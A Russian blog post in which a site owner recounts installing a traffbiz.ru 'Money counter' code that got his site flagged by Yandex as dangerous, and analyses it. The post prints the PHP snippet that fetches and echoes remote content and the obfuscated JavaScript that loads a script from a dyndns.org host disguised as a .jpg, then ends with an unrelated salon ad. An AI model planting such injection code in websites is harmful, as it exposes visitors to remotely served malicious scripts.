Как я поймал вирус на сайт или отзыв о traffbiz.ru

Всем привет! Возможно, если вы заходили на atamovich.ru в течении последних двух дней, то ваш браузер предупреждал о том, что сайт угрожает компьютеру и т.д. и т.п. В этой статья я поделюсь своим опытом борьбы с вирусами, если такие завелись у вас на сайте. Правда, «вирус» это не то, что надо было бы употреблять, но для простоты изложения и понимания буду писать именно так.

Зайдя на блог Михаила Шакина, наткнулся на интересный баннер системы traffbiz.ru. Подумал, мол, Михайл человек проверенный и авторитетный в многих кругах, не стану тратить время на проверку системы, зарегистрируюсь ка сразу и установлю все, что надо к себе на сайт.

Зарегистрировался, изучил систему, установил счетчик. Все вроде бы просто, да не все 😉

Схема такая: устанавливаешь счетчик — получаешь деньги за RU уникальных посетителей. Заманчиво, не правда ли?

На первый взгляд неопытного пользователя код системы выглядит довольно безобидно, всего каких то пару строчек обрамленные php. Разве смогут что-то плохое сделать пару строчек кода? Вирусы же большие и длинные!

Код выглядил вот так:

Вот нельзя доверять людям, нельзя. При установке я даже не посмотрел, что значит этот код.
Давайте разберем.
$urlp = «http://all-x.ru/?i=30459&c=5»;
Создаем переменную и присваиваем ей адрес
$code = @file_get_contents($urlp);
Создаем вторую переменную, в которую загружаем все то, что нашли по тому адресу
echo $code;
Выводим вторую переменную с загруженным кодом.

А теперь давайте подумаем. Получается с помощью этого коротенького кода злоумышленник может выводить на сайте все что угодно, собирать информацию о посетителях, собирать пароли, заражать и так далее… Тут только фантазией ограничивается 😉

Смотрим, как этот код отображается на самом деле в исходном коде сайта:

Как можете видеть, код «немножко» другой, нежели который мы видели. Оно и понятно, первый же был php-код, а второй уже JS.

Давайте теперь разберем его.

<!—Money counter—>
<script type=»text/javascript»> — тут понятно, обозначаем, что дальше будет идти JavaScript
<!— document.write(‘<sc’ + ‘ript language=»JavaScript» rel=»nofollow» ‘ + ‘src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></sc’ + ‘ript>’); //—> — выводим текст посредством склеивания отрывков.
</script><!—/Money counter—> — закрывающие теги

document.write() выведет вам все, что вы укажите в скобках. Если текст заключен вот в такие кавычки ‘text’, то выводится строка. + означает склеивание строк.

Итак, что же делает этот скрипт? Он выводит такую строчку: <script language=»JavaScript» rel=»nofollow» src=»http://112zcfhqlb.dyndns.org/30940/counter5.jpg» title=»Money counter» border=»0″ width=»15″ height=»15″></script>

Думаете выводит картинку? А нет! Точнее, да! Но, видимо, не только ее…

Параметр scr в теге <script> указывает, из какого файла загружать программу.

---

В любом случае, Яндекс считает данный скрипт опасным и «закрывает» сайты, найдя его у вас на странице.

---

Вам может придти вот такое сообщение:

При дальнейшем общении с Тех.Поддержкой можно узнать, как выглядит вредоносный код.

После устранения, можно наблюдать вот такую картинку в панели Я.Вебмастера:

Я не имею ничего против Михаила или ТраффБиз.ру, со всеми бывает)))

Надеюсь, вы хоть что-то поняли из этого полуночного бреда. Всем спокойной ночи!

Кстати, в скором времени напишу интересный аналитический отчет, так что советую подписаться на RSS 😉

UPD: у Яндекса есть интересная статья по этому поводу, в которой как раз все объясняется!

Ваш Atamovich

Кстати, вы ходите в обычные парикмахерские или в салоны красоты? Если вам нужны салоны красоты в Москве, то прошу последовать по ссылке! Там отличный каталог салонов, с описанием и рейтингом. Не поленитесь, полистайте каталог! Можно ещё и записаться в режиме онлайн!